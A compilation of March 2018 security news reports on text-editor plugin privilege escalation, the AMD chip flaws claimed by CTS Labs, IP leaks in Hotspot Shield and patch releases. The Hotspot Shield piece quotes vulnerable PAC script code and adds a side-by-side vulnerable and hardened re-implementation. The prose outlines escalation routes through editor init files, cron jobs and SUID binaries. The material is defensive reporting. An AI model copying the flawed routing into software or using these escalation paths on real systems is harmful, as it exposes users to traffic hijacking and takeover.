One part of the problem is that users — particularly on Linux servers — may often need to execute text editors with elevated privileges. If an attacker can plant malicious extensions in locations specific to the targeted text editor, their code will get executed with elevated privileges when the application is launched or when certain operations are performed.

Text editors allow privilege escalation

For an attack to work, the attacker needs to somehow hijack a legitimate user account that has regular privileges, which can be achieved through phishing, social engineering and other methods. In the case of a malicious insider, the vulnerability found by SafeBreach can be useful for executing code with elevated privileges if their permissions have been restricted by the system administrator to certain files and commands.

Depending on the targeted editor, the attacker needs to create specially crafted scripts or package files, and place them in specific plugin directories. In some cases, the hacker may need to create additional files and enable extensions in order for the attack to work, but this should not be difficult if they have access to a less-privileged account.

In the case of Emacs, for example, attackers simply need to add one line of code to the “init.el” file in order to get their code executed on startup. Azouri noted that editing the init file does not require root permissions. A report published on Thursday by SafeBreach details how privilege escalation can be achieved through each of the tested editors.

While there are no reports of malicious attacks abusing text editors for privilege escalation, incidents involving abuse of extensibility are not unheard of. For instance, Kite, which offers Python code enhancements and suggestions for several popular editors via extensions, drew criticism last year after integrating promotional links into its users’ coding apps.

SafeBreach also pointed to a couple of incidents related to npm packages that resulted in malicious code getting loaded and applications breaking. Azouri has described several possible scenarios involving post-exploitation techniques that can be leveraged to gain root access on Unix-like systems.

“Badly configured Cron jobs, that are a natural part in Unix-like systems, can be abused to get root access. In a similar manner to the technique we present, an attacker might find binaries in cron jobs which are writable, and modify them to his/her needs. They are then executed as root by the OS (or other users, depending on the cron job settings), giving the attacker privileged execution,” Azouri told SecurityWeek.

Another example involves exploiting file permissions, such as special SUID executables. “SUID is a feature in Unix-like systems that allows configuring some executables to run as a specific user (the owner of the file). Finding a file that is owned by root and is set with SUID, can give a way for an attacker to get privileged execution,” the researcher said.

He added, “Some cases exist where the developers of 3rd party plugins, after gaining popularity for their plugin, updated the plugin's code with malicious code (either intentionally or unintentionally, the latter can be as a result of getting hacked and the attacker obtained access to the codebase). This update was downloaded by the plugin users, and then executed without them being aware of the malicious change.”

The developers of the text editors analyzed by SafeBreach said they don’t plan on making any changes to prevent this type of abuse. Vim developers admitted that they can take measures, but they appear to believe that it’s the user’s responsibility to defend against these attacks.

Emacs developers will not make any changes to their application due to the fact that this type of privilege escalation can leverage many apps and releasing a patch on their end would not completely address the issue.

Gedit has yet to confirm SafeBreach’s findings, and Sublime has not provided the researchers with any updates since acknowledging their bug report.


CTS Labs Provides Clarifications on AMD Chip Flaws
15.3.2018 securityweek
Vulnerebility

As a result of massive backlash from the industry, Israel-based security firm CTS Labs has provided some clarifications about the recently disclosed AMD processor vulnerabilities and its disclosure method.

CTS Labs this week published a report providing a brief description of 13 critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The flaws can allegedly be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.

The vulnerabilities affect AMD’s Secure Processor, an environment where critical tasks are executed in order to secure the storage and processing of sensitive data and applications. The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges to the targeted machine.

AMD was only notified 24 hours before the vulnerabilities were disclosed, but no technical details have been published in order to prevent exploitation for malicious purposes.

CTS Labs was only launched recently and its founders’ work experience has raised some questions. This, combined with the lack of technical details in the report, has made many people doubt that the vulnerabilities exist or that they are as critical as the company claims.

However, Dan Guido, CEO of Trail of Bits, and Alex Ionescu, a reputable researcher and Windows security expert, have confirmed CTS Labs’ findings after reviewing technical information provided by the company. Guido was paid to review the work, but Ionescu said he wasn’t.

CTS Labs has come under fire for not giving AMD time to release patches before its disclosure. A disclaimer from the firm and a report from a controversial company named Viceroy Research suggest that the existence of the vulnerabilities was made public as part of an investment strategy, similar to the 2016 incident involving MedSec, Muddy Waters and St. Jude Medical.

In response to criticism, CTS Labs CTO Ilia Luk-Zilberman argued that the company’s approach to “responsible disclosure” is more beneficial for the public. He proposes that instead of notifying vendors and giving them a certain amount of time to release patches before disclosing full technical details, researchers should notify the public and the vendor at the same time without ever making technical details public, unless the flaws have been patched.

Luk-Zilberman admitted that CTS should have asked several third-parties to confirm its findings before going public in order to convince everyone that their claims are true.

While the CTO’s argument might make sense, many members of the industry are not convinced, particularly due to CTS’s disclaimer claiming that it may have, “either directly or indirectly, an economic interest in the performance of the securities [of AMD].” There is also the report from Viceroy, which attempts to persuade that “AMD is worth $0.00 and will have no choice but to file for Chapter 11 (Bankruptcy) in order to effectively deal with the repercussions of recent discoveries.”

CTS Labs has not provided any clarifications regarding its financial interests related to the disclosure.

Regardless of CTS Labs’ motives, Ionescu and Guido have confirmed the vulnerabilities and warned that they should not be ignored.

Alex Ionescu confirms vulnerabilities found by CTS in AMD processors

Dan Guido confirms vulnerabilities found by CTS in AMD processors

In an update posted on its AMDflaws.com website, CTS claimed that exploitation of the vulnerabilities does not require physical access; executing a file with local admin privileges on the targeted machine is enough.

“The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine,” CTS said. “To clarify misunderstandings -- there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin -– and they will work.”

After the news broke, AMD told customers and the media that it’s investigating CTS Labs’ claims.

AMD is one of the major processor makers affected by Meltdown and Spectre, and while the company has confirmed that the flaws impact some of its products, it has insisted that the risk of attacks is small.


VPN leaks affect 3 Major VPN vendors, only Hotspot Shield promptly fixed it
15.3.2018 securityaffairs
Vulnerebility

The website VPNMentor discovered IP leak issues in three major VPN products; only Hotspot Shield promptly fixed them.
The website VPNMentor decided to hire a group of hackers to test popular virtual private networks (VPN) for vulnerabilities that could put users at risk.

The results of the tests revealed that the solutions evaluated by the white hat hackers suffer from severe privacy-leak issues; none of the tested solutions fully protects users’ IP addresses from prying eyes.

Such flaws in VPN software could be exploited by governments and hostile organizations to track individuals online.

Paulos Yibelo, a researcher at Cure53 aka Filedescriptor, and an anonymous colleague were tasked by VPNMentor to test the Pure VPN, Zenmate, and Hotspot Shield VPN solutions.

“We tested 3 popular VPNs: Hotspot Shield, PureVPN, and Zenmate with accredited researchers to find if the VPNs could leak data. While we hoped to find zero leaks, we regretfully found that all of them leak sensitive data.” reads a blog post published by VPNMentor.

The good news is that once the issues were reported to the development teams behind the three VPN solutions, one of them, Hotspot Shield, promptly released a fix. The other vendors still haven’t replied to VPNMentor; for this reason the website decided to publicly disclose the test results only for Hotspot Shield while waiting for the others to fix their flaws.

The vulnerabilities in Hotspot Shield affect the solution’s Chrome extension; the desktop and mobile applications are secure.

The first vulnerability, tracked as CVE-2018-7879, allowed an attacker to hijack a user’s traffic once the user is tricked into visiting a malicious site.

“We observed the following PAC script used in Hotspot Shield Chrome extension:

```
function FindProxyForURL(url, host) {
  // If the URL carries act=afProxyServerPing, route all traffic through whatever
  // host the "server" parameter names; no check is made on which site supplied it.
  if(url.indexOf('act=afProxyServerPing') != -1) {
    let parsed = url.match(/act=afProxyServerPing&server=([^&]+)/);
    if(parsed && parsed[1]) return 'https '+parsed[1]+':443; DIRECT;';
  }
  // remaining routing rules omitted from the quote
}
```

It detects if the current URL has the query parameter act=afProxyServerPing, and if it does, it routes all traffic to the proxy hostname provided by the server parameter.”

[Image: Hotspot Shield proxy hijack]

The issue appears to stem from internal test code that was never removed; it does not validate which host is making this “call”.

An attacker could craft a link containing those parameters to redirect the user’s traffic to a proxy server under the attacker’s control.

The IP leak is caused by the whitelist the extension uses for “direct connection” (traffic that bypasses the proxy).

```
let whiteList = /localhost|accounts\.google|google\-analytics\.com|chrome\-signin|freegeoip\.net|event\.shelljacket|chrome\.google|box\.anchorfree|googleapis|127\.0\.0\.1|hsselite|firebaseio|amazonaws\.com|shelljacket\.us|coloredsand\.us|ratehike\.us|pixel\.quantserve\.com|googleusercontent\.com|easylist\-downloads\.adblockplus\.org|hotspotshield|get\.betternet\.co|betternet\.co|support\.hotspotshield\.com|geo\.mydati\.com|control\.kochava\.com/;
if(isPlainHostName(host) || shExpMatch(host, '*.local')
   || isInNet(ip, '10.0.0.0', '255.0.0.0') || isInNet(ip, '172.16.0.0', '255.240.0.0')
   || isInNet(ip, '192.168.0.0', '255.255.0.0') || isInNet(ip, '173.37.0.0', '255.255.0.0')
   || isInNet(ip, '127.0.0.0', '255.255.255.0') || !url.match(/^https?/)
   || whiteList.test(host) || url.indexOf('type=a1fproxyspeedtest') != -1) return 'DIRECT';
```

The tests revealed that any domain that includes localhost in the URL bypasses the proxy (for example, localhost.foo.bar.com), as does any URL containing type=a1fproxyspeedtest.
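Both bypasses come down to the same design error: routing decisions keyed on substrings (an unanchored regex over the host, a query parameter found anywhere in the URL) instead of on an exact, normalized host. The following is an added example, not Hotspot Shield's code, that re-implements just the whitelist and proxy-ping logic in two forms: the vulnerable substring version, and a hardened version that only honours exact or suffix-anchored host matches and only accepts a proxy-ping redirect when both the requesting page and the named server are on a vendor domain. The VPN proxy address and the vendor suffix are assumptions, and it runs in Node.js rather than in a PAC engine, so the PAC built-ins (isInNet and friends) are left out.

```javascript
// Added example: vulnerable substring-based routing beside a hardened host-anchored version.
// VPN_PROXY and VENDOR_SUFFIXES are assumptions, not values from the extension.
const VPN_PROXY = 'PROXY vpn-gateway.example:443';

// Subset of the leaked whitelist, kept as an unanchored regex (the flaw).
const WHITELIST_RE = /localhost|accounts\.google|hotspotshield|127\.0\.0\.1/;

function vulnerableRoute(url, host) {
  // Proxy-ping: trusts the "server" parameter no matter which page supplied it.
  if (url.indexOf('act=afProxyServerPing') !== -1) {
    const parsed = url.match(/act=afProxyServerPing&server=([^&]+)/);
    if (parsed && parsed[1]) return 'HTTPS ' + parsed[1] + ':443';
  }
  // Whitelist: a host merely *containing* "localhost" matches, and any URL carrying
  // the speed-test parameter goes direct, exposing the user's real IP address.
  if (WHITELIST_RE.test(host) || url.indexOf('type=a1fproxyspeedtest') !== -1) return 'DIRECT';
  return VPN_PROXY;
}

// Hardened version: decisions are keyed on the normalized host only.
const DIRECT_HOSTS = new Set(['localhost', '127.0.0.1']);
const VENDOR_SUFFIXES = ['.hotspotshield.com']; // assumption for illustration

function normalizeHost(host) {
  return String(host).trim().toLowerCase().replace(/\.$/, ''); // drop trailing dot
}

// True only for the vendor apex or a subdomain of it, never for "hotspotshield.example".
function isVendorHost(h) {
  return VENDOR_SUFFIXES.some(s => h === s.slice(1) || h.endsWith(s));
}

function parseQuery(url) {
  const params = {};
  const q = url.indexOf('?');
  if (q === -1) return params;
  for (const pair of url.slice(q + 1).split('#')[0].split('&')) {
    const [k, v = ''] = pair.split('=');
    try { params[decodeURIComponent(k)] = decodeURIComponent(v); } catch (e) { /* skip malformed */ }
  }
  return params;
}

function hardenedRoute(url, host) {
  const h = normalizeHost(host);
  const params = parseQuery(url);
  // Proxy-ping is only honoured when the page itself is a vendor host and the named
  // server is too; the speed-test parameter no longer influences routing at all.
  if (isVendorHost(h) && params.act === 'afProxyServerPing' && params.server) {
    const server = normalizeHost(params.server);
    if (isVendorHost(server)) return 'HTTPS ' + server + ':443';
  }
  if (DIRECT_HOSTS.has(h) || isVendorHost(h)) return 'DIRECT';
  return VPN_PROXY;
}
```

The hardened form returns the uppercase PAC keyword HTTPS; the quoted extension code used a lowercase keyword, which is reproduced verbatim in the quote and not changed here. With the hardened logic, localhost.foo.bar.example, a speed-test parameter on an arbitrary site, and a proxy-ping supplied by an arbitrary site all stay on the VPN proxy.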

To demonstrate the IP leak, the researchers visited the site with the unpatched version of Hotspot Shield.

[Image: Hotspot Shield IP leak]

For now, the details about bugs in Zenmate and VPN Shield are being kept under wraps because those vendors haven’t responded to VPN Mentor. Both leaked user IPs.

Experts confirmed that both PureVPN’s and ZenMate’s vulnerabilities could be currently exploited to unmask VPN users.

“If you are a user of Zenmate or PureVPN, contact the support team and ask for the vulnerabilities to be fixed ASAP”, the post said.


What’s new in Microsoft Patch Tuesday updates for March 2018?
15.3.2018 securityaffairs
Vulnerebility

Microsoft Patch Tuesday updates for March 2018 – Microsoft released security updates for 75 security flaws, 14 of them rated Critical and 61 rated Important.
Microsoft Patch Tuesday updates for March 2018 address 75 vulnerabilities; all of the critical flaws fixed this month affect the Internet Explorer and Edge web browsers.

Most of the critical vulnerabilities are remote code execution flaws that are related to the way browser scripting engines handle objects in memory.

One of the critical vulnerabilities fixed by the Microsoft Patch Tuesday can lead to the disclosure of information that can be leveraged to further hack the targeted system.

Two vulnerabilities fixed this month, a denial-of-service (DoS) issue in ASP.NET 2.0 (CVE-2018-0808) and a privilege escalation in Microsoft Exchange Server 2010 through 2016 editions (CVE-2018-0940), have been publicly disclosed before patches became available, but according to Microsoft, there is no news about their exploitation in the wild.

Microsoft also fixed a privilege escalation vulnerability that resides in the Windows installer and that could be exploited by an authenticated attacker to run arbitrary code with elevated permissions.

A remote code execution vulnerability exists in the Credential Security Support Provider protocol (CredSSP).

One of the most debated issues fixed by Microsoft is the CredSSP Remote Code Execution Vulnerability (CVE-2018-0886) that affects all versions of Windows to date.

The flaw could be used by a remote attacker to exploit RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) to steal data and run malicious code.

The vulnerability is a logical cryptographic issue in CredSSP that can be exploited by an attacker in a man-in-the-middle position to steal session authentication data and perform a Remote Procedure Call attack.


The Microsoft Patch Tuesday updates for March 2018 also addressed other vulnerabilities in:

Microsoft Office
.NET Core
PowerShell Core
Microsoft Hyper-V
Microsoft Windows
ChakraCore


Security Firm Under Fire Over Disclosure of AMD Chip Flaws
14.3.2018 securityweek
Vulnerebility

AMD is investigating claims that its processors are affected by more than a dozen serious vulnerabilities, and the company that found the flaws is facing backlash over its disclosure method.

Israel-based CTS Labs on Tuesday published a report claiming that it has found 13 critical vulnerabilities and backdoors in AMD’s EPYC, Ryzen, Ryzen Pro, and Ryzen Mobile processors over the course of six months. Only a high level description of the security holes has been made public, but AMD was informed of the flaws only one day before disclosure.

The vulnerabilities

CTS Labs has set up a dedicated website and assigned names to each type of vulnerability it has found. According to the company, the security holes mostly affect AMD’s Secure Processor technology and they can be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.

Vulnerabilities found in Ryzen and other AMD processors

The vulnerability class dubbed MASTERKEY by CTS Labs can reportedly be exploited to deploy persistent malware inside the AMD Secure Processor, but exploitation involves installing a malicious BIOS update. These flaws can be used to bypass firmware and software security features, including the Firmware Trusted Platform Module (FTPM), Secure Encrypted Virtualization (SEV), Windows Defender Credential Guard, and Microsoft’s Virtualization-based Security (VBS) technologies. MASTERKEY can be leveraged to steal network credentials and cause physical damage to targeted devices, CTS said.

The RYZENFALL vulnerabilities, which affect Ryzen processors from AMD, in the worst case scenario, can be exploited to take complete control of the Secure Processor. Attackers can leverage this to plant malware that cannot be removed by traditional security solutions, researchers said.

FALLOUT vulnerabilities affect the boot loader component of the Secure Processor in EPYC CPUs. Exploitation requires a digitally-signed driver supplied by the vendor. Attackers can leverage FALLOUT to plant highly persistent malware, disable BIOS protections, steal network credentials, and bypass security mechanisms.

The last class of vulnerabilities has been dubbed CHIMERA. These are backdoors in AMD’s Promontory chipsets, which are used in Ryzen and Ryzen Pro workstations. The backdoors, found in both the firmware and the hardware, can be exploited to execute malicious code inside the chipset’s internal processor, CTS said. These backdoors were reportedly introduced by ASUS subsidiary ASMedia.

Exploitation of all the vulnerabilities requires elevated privileges to the targeted machine.

Impact and comparison to Meltdown/Spectre

Security firm enSilo, which published an FAQ shortly after CTS Labs made available its report, compared the vulnerabilities to Meltdown and Spectre, which impact CPUs from Intel, AMD, ARM and others. However, some argued that the issues disclosed by CTS Labs are nowhere near as severe due to the fact that they mostly impact AMD’s Secure Processor technology rather than the hardware itself.

Dan Guido, CEO of Trail of Bits, said his company reviewed CTS Labs’ technical report and confirmed that the vulnerabilities exist and that the proof-of-concept (PoC) exploits work, but admitted that all flaws require administrator privileges for exploitation. Trail of Bits was paid by CTS Labs to review the findings.

Researcher Arrigo Triulzi called CTS’s report “over-hyped beyond belief” and a “whitepaper worthy of an ICO.” Triulzi pointed out that if an attacker obtains elevated privileges and is able to perform malicious BIOS updates and load unauthorized code, they would not need to exploit these vulnerabilities in order to gain complete control over a system.

Triulzi admitted that the CHIMERA vulnerability could pose a problem, but only “if you are a government agency.” CTS noted in its report that it may not be possible to directly fix this bug, and it may require a workaround or a recall of the product.

Controversial disclosure

AMD was only given one day to prepare for CTS Labs’ disclosure and the company says it has launched an investigation. Vendors are typically given months to fix or mitigate these types of flaws; in the case of Meltdown and Spectre, affected companies were given roughly half a year to work on patches.

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings,” AMD stated.

While CTS Labs has not released any details and claims no technical information will be made available any time soon to prevent abuse, its methods have been called into question.

“The way that CTS Labs chose to publicly identify vulnerabilities they discovered in AMD chips is a case study in what not to do when you discover a software or hardware weakness in the wild,” Jon Bottarini, Technical Program Manager at HackerOne, told SecurityWeek. “Responsible disclosure should be the prime directive for security researchers, and by only allowing AMD 24 hours to respond before CTS Labs notified the press, CTS stood to do more harm than good.”

Many potentially serious vulnerabilities have been found in similar Intel technologies over the past year, but in most cases they were responsibly disclosed to Intel and the company started working on patches before disclosure.

On the other hand, CTS’s unorthodox disclosure method may have been driven by financial motives.

“Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” CTS Labs noted in its report.

A controversial company named Viceroy Research published its own report following CTS Labs’ disclosure in an apparent effort to short AMD stock.

“In light of CTS’s discoveries, the meteoric rise of AMD’s stock price now appears to be totally unjustified and entirely unsustainable. We believe AMD is worth $0.00 and will have no choice but to file for Chapter 11 (Bankruptcy) in order to effectively deal with the repercussions of recent discoveries,” Viceroy Research said.

In addition to the findings, some have called into question the credibility of CTS Labs, a company founded in 2017, and its founders’ claims regarding other firms they launched and worked for.

This would not be the first time a report describing vulnerabilities in a product is used as part of an investment strategy. In 2016, investment research firm Muddy Waters used a report from medical cybersecurity firm MedSec to short-sell St. Jude Medical.


Microsoft Releases More Patches for Meltdown, Spectre
14.3.2018 securityweek
Vulnerebility

Microsoft informed users on Tuesday that it released additional patches for the CPU vulnerabilities known as Meltdown and Spectre, and removed antivirus compatibility checks in Windows 10.

Meltdown and Spectre allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be resolved with software updates, but Spectre Variant 2 requires microcode patches.

In addition to software mitigations, Microsoft recently started providing microcode patches as well. It initially delivered Intel’s microcode updates to devices running Windows 10 Fall Creators Update and Windows Server 2016 (1709) with Skylake processors.

Now that Intel has developed and tested patches for many of its products, Microsoft has also expanded the list of processors covered by its Windows 10 and Windows Server 2016 updates. Devices with Skylake, Coffee Lake and Kaby Lake CPUs can now receive the microcode updates from Intel via the Microsoft Update Catalog.

Microsoft also informed customers on Tuesday that software patches for the Meltdown vulnerability are now available for x86 editions of Windows 7 and Windows 8.1.

The company has also decided to remove the antivirus compatibility checks in Windows 10. The decision to introduce these checks came after the tech giant noticed that some security products had created compatibility issues with the Meltdown patches. This resulted in users not receiving security updates unless their AV vendor made some changes.

Microsoft has determined that this is no longer an issue on Windows 10 so the checks have been removed. On other versions of the operating system, users will still not receive updates if their antivirus is incompatible.

Microsoft’s Patch Tuesday updates for March 2018 fix over 70 flaws, including more than a dozen critical bugs affecting the company’s Edge and Internet Explorer web browsers.


Microsoft Patches Remote Code Execution Flaw in CredSSP
14.3.2018 securityweek
Vulnerebility

A vulnerability (CVE-2018-0886) patched by Microsoft with its March 2018 security patches was a remote code execution flaw in the Credential Security Support Provider protocol (CredSSP) used by Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM).

This vulnerability can be exploited by an attacker to relay user credentials to execute code on a target system. The authentication provider, Microsoft explains, processes authentication requests for other applications, meaning that the vulnerability puts all applications that depend on CredSSP at risk.

Preempt, which discovered the bug, explains that this is a logical vulnerability that affects all Windows versions to date. With almost all enterprise customers using RDP, exploitation of this vulnerability could have a vast impact, the researchers say.

Cybercriminals can set up a man-in-the-middle attack, wait for a CredSSP session, and then steal session authentication to perform a Remote Procedure Call (DCE/RPC) attack on the server the user attempted to connect to.

Chris Morales, head of security analytics at Vectra, pointed out to SecurityWeek in an emailed comment that this type of activity could rather be considered a form of internal reconnaissance that any company properly monitoring their internal environment should be able to detect.

“In the big picture, there are a lot of variables that have to be right in a targeted environment for this attack to succeed. Most importantly, the attacker needs to already be on the network and in a position between the clients and servers. If an attacker is already that deep in the network, there are many other things they could do to scope out a network, find authentication accounts and compromise a server,” Morales said.

Once they have stolen the session, the attacker can run commands to install programs, read, modify or delete data, or create new accounts with full user rights.

Scenarios in which the vulnerability can be exploited include those where the attacker has some physical access to the targeted network, those where Address Resolution Protocol (ARP) poisoning is used for lateral movement, or those where the attacker is targeting sensitive servers via vulnerable routers or switches, Preempt says. The company also published a video detailing the vulnerability.

“To be fully protected against this vulnerability users must enable Group Policy settings on their systems and update their Remote Desktop clients. The Group Policy settings are disabled by default to prevent connectivity problems,” Microsoft explains.

The vulnerability impacts Windows 7, Windows 8.1, and Windows 10 systems, as well as Windows Server 2008, Windows Server 2012, and Windows Server 2016.

To address the issue, Microsoft released an update to correct the manner in which CredSSP validates requests during the authentication process. The update patches the CredSSP authentication protocol and the Remote Desktop clients for all affected platforms.

“Mitigation consists of installing the update on all eligible client and server operating systems and then using included Group Policy settings or registry-based equivalents to manage the setting options on the client and server computers. We recommend that administrators apply the policy and set it to “Force updated clients” or “Mitigated” on client and server computers as soon as possible,” Microsoft says.

The software giant also explains that this patch is only the first update it is releasing to address the issue. An update planned for next month should “enhance the error message that is presented when an updated client fails to connect to a server that has not been updated,” while another planned for May should “change the default setting from Vulnerable to Mitigated.”

The company also urges admins to check a compatibility table it published on Tuesday and pay close attention to Group Policy or registry settings pairs that result in “Blocked” interactions between clients and servers.

“Vulnerabilities, like this CredSSP issue that Microsoft is fixing today, become yet another example of how dangerous it can be to rely on security or administration tools without locking them down with hardened configurations. RDP is a widely used tool, but, as this exploit shows, a Man-in-the-Middle attack makes the use of this tool especially dangerous if the user is logging in with an administrator credential of any sort,” Nathan Wenzler, chief security strategist at AsTech, told SecurityWeek in an emailed comment.

“It’s imperative that admins and security practitioners are doing more to reduce the amount of privileged access their administrators possess, that tools such as RDP are disabled if they're not being used, and doing whatever else they can to limit the amount of administrator-level exposure that an attacker might be able to compromise anywhere along the chain and then use to wreak havoc on the rest of the network,” Wenzler concluded.


SAP Patches Decade-Old Flaws With March 2018 Patches
14.3.2018 securityweek
Vulnerebility

SAP this week released its March 2018 set of security patches to address High and Medium priority vulnerabilities in its products.

A total of 10 Security Notes were included in the SAP Security Patch Day this month, three rated High priority and 7 considered Medium priority. Two of the Notes were updates for previously released Security Notes.

SAP this month included 17 Support Package Notes in the Security Patch Day, for a total of 17 Security Notes, ERPScan (a company that specializes in securing Oracle and SAP applications) reports. 11 of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most severe of the Security Notes addresses three vulnerabilities in SAP Internet Graphics Server (IGS) and carries a High priority rating (CVSS Base Score: 8.8). The bugs include CVE-2004-1308 (memory corruption), CVE-2005-2974 (denial of service), and CVE-2005-3350 (remote code execution).

The vulnerabilities, which have been around for over a decade, impact libtiff, giflib and libpng, three third-party open source libraries that handle images (TIFF, GIF and PNG, respectively).

The use of open source software isn’t new and provides lots of advantages, especially since many open source libraries have been tried and tested. However, not all of them should be taken for granted, and software companies such as SAP should always keep their programs up-to-date to eliminate any possible bugs.

“Open source libraries used in commercial products are necessary to maintain quality; however, it should be clear that there is a gray area, in which trust is assumed but never received,” Onapsis (another company focused on securing Oracle and SAP products) points out.

This month, SAP also addressed two High risk information disclosure vulnerabilities impacting SAP HANA capture & replay trace file (CVE-2018-2402 - CVSS Base Score: 7.6) and SAP Business Process Automation (BPA) by Redwood (CVE-2018-2400 - CVSS Base Score: 7.5).

Of all 27 SAP Security Notes, 6 have a High priority rating and 19 are rated Medium priority. 4 of all the patches are updates to previously released Security Notes.

The most common type of vulnerability addressed this month is missing authorization check, with 6, followed by information disclosure at 5, and Cross-Site Scripting at 4. SAP also addressed 3 SQL injection bugs, 2 directory traversal issues, 2 implementation flaws, and denial of service, hardcoded credentials, XML external entity, code injection, and clickjacking bugs.


Researchers Find Critical Security Flaws in AMD Chips
14.3.2018 securityweek
Vulnerebility

Security researchers said Tuesday they discovered flaws in chips made by Advanced Micro Devices that could allow hackers to take over computers and networks.

Israeli-based security firm CTS Labs published its research showing "multiple critical security vulnerabilities and exploitable manufacturer backdoors" in AMD chips.

CTS itemized 13 flaws, saying they "have the potential to put organizations at significantly increased risk of cyberattacks."

The report comes weeks after Intel disclosed similar hardware-based flaws dubbed Meltdown and Spectre, sparking widespread computer security concerns and a congressional inquiry.

CTS said the newly discovered flaws could compromise AMD's new chips that handle applications in the enterprise, industrial and aerospace sectors, as well as consumer products.

In a 20-page white paper, the researchers said the AMD Secure Processor, the gatekeeper responsible for the security of AMD processors, contains "critical vulnerabilities" that "could allow malicious actors to permanently install malicious code inside the Secure Processor itself."

"These vulnerabilities could expose AMD customers to industrial espionage that is virtually undetectable by most security solutions," the researchers said.

CTS said AMD's Ryzen chipset, which AMD outsourced to a Taiwanese chip manufacturer, ASMedia, "is currently being shipped with exploitable manufacturer backdoors inside."

This could allow attackers "to inject malicious code into the chip" and create "an ideal target" for hackers, the researchers said.

"CTS believes that networks that contain AMD computers are at a considerable risk," the report said.

"The vulnerabilities we have discovered allow bad actors who infiltrated the network to persist in it, surviving computer reboots and reinstallations of the operating system.

"This allows attackers to engage in persistent, virtually undetectable espionage, buried deep in the system."

AMD, one of the largest semiconductor firms specializing in processors for PCs and servers, said it was studying the latest report. "At AMD, security is a top priority and we are continually working to ensure the safety of our users as new risks arise," the California-based company said in a statement.

"We are investigating this report, which we just received, to understand the methodology and merit of the findings."

Analysts at the security firm enSilo said the AMD flaws could be worse than those affecting Intel chips.

"The impact of these vulnerabilities is more severe than Meltdown/Spectre as it allows an attacker to execute highly privileged code and persist on the victim machine," enSilo said in a blog post.

Additionally, some of the flaws may be nearly impossible to patch.

"We estimate that without patches from AMD, protection against the vulnerabilities can be limited at best," enSilo researchers said. "The best protection is to block malware that attempts to leverage these vulnerabilities."


Microsoft Patches Over Dozen Critical Browser Flaws
14.3.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for March 2018 fix a total of 75 vulnerabilities, including more than a dozen critical flaws affecting the company’s Edge and Internet Explorer web browsers.

All the security holes rated critical this month affect the web browsers. The vast majority of the issues have been described as remote code execution flaws that exist due to the way browser scripting engines handle objects in memory.

The only critical vulnerability that cannot be exploited for arbitrary code execution can lead to disclosure of information that can be leveraged to further hack the targeted system.

Two of the flaws patched by Microsoft have been publicly disclosed before patches became available, but they are only rated as “important,” and there is no evidence of malicious exploitation. These bugs are a denial-of-service (DoS) issue in ASP.NET and a privilege escalation in Exchange.

The Zero Day Initiative (ZDI) pointed out that the Exchange vulnerability exists in the Outlook Web Access (OWA) component and it can be exploited for phishing attacks.

Another interesting privilege escalation flaw affects the Windows installer and it allows an authenticated attacker to run arbitrary code with elevated permissions.

“At first glance, this doesn’t seem very crucial since an attacker would need the ability to run programs on a target system to exploit this vulnerability,” ZDI said in a blog post. “However, this type of bug is often used by malware authors to “piggyback” their malicious code on top of innocuous code. It’s always easier to convince someone to install ‘GreatNewGame.exe’ instead of ‘EvilMalware.exe’.”

Another noteworthy vulnerability is CVE-2018-0886, a remote code execution bug affecting the Credential Security Support Provider (CredSSP) protocol. In addition to applying Microsoft’s patch, users also need to make some settings changes in order to fully mitigate potential attacks.

Microsoft’s latest security updates also patch vulnerabilities in Hyper-V, Access, Identity Manager, SharePoint, and Windows. The company has also updated the Flash Player components present in its products to address a couple of flaws fixed on Tuesday by Adobe.


Adobe Patches Critical Code Execution Flaws in Dreamweaver, Flash
14.3.2018 securityweek
Vulnerebility

Security updates released by Adobe on Tuesday patch several vulnerabilities in the company’s Dreamweaver, Flash Player and Connect products.

Flash Player 29.0.0.113 for Windows, Mac, Linux and Chrome OS addresses two critical flaws affecting versions 28.0.0.161 and earlier.

The vulnerabilities have been described as a use-after-free bug (CVE-2018-4919) and a type confusion issue (CVE-2018-4920), both of which can be exploited for remote code execution. While they have been classified as critical, Adobe has assigned them a priority rating of “2,” which indicates that the company does not expect to see exploits any time soon.

The security holes were discovered by Yuki Chen of Qihoo 360 Vulcan Team, who reported them to Adobe via the Chromium Vulnerability Rewards Program.

In Dreamweaver CC, Adobe resolved a critical OS command injection vulnerability discovered by researcher Andrea Micalizzi, also known as “rgod.” The flaw is serious, but the product has never been targeted by hackers, at least to Adobe’s knowledge.

The flaw, CVE-2018-4924, affects versions 18.0 and earlier for Windows and it’s related to the Dreamweaver URI handler. An attacker can exploit the weakness for arbitrary code execution in the context of the current user.

The latest version of Adobe Connect patches two important vulnerabilities: an OS command injection flaw that can lead to arbitrary file deletion, and an unrestricted SWF file upload bug that can be exploited for cross-site scripting (XSS) attacks. Micalizzi and Ciaran McNally have been credited for finding the flaws.

Adobe was recently forced to release an out-of-band update for Flash Player after learning of a vulnerability that had been exploited in targeted attacks by a threat actor believed to be from North Korea.

Microsoft’s Patch Tuesday updates for this month fix over 70 vulnerabilities, including more than a dozen critical flaws affecting the Edge and Internet Explorer web browsers.


13 Critical flaws and exploitable backdoors found in various AMD chips
14.3.2018 securityaffairs 
Vulnerebility

Security researchers at Israel-based CTS-Labs have discovered 13 critical vulnerabilities and exploitable backdoors in various AMD chips.
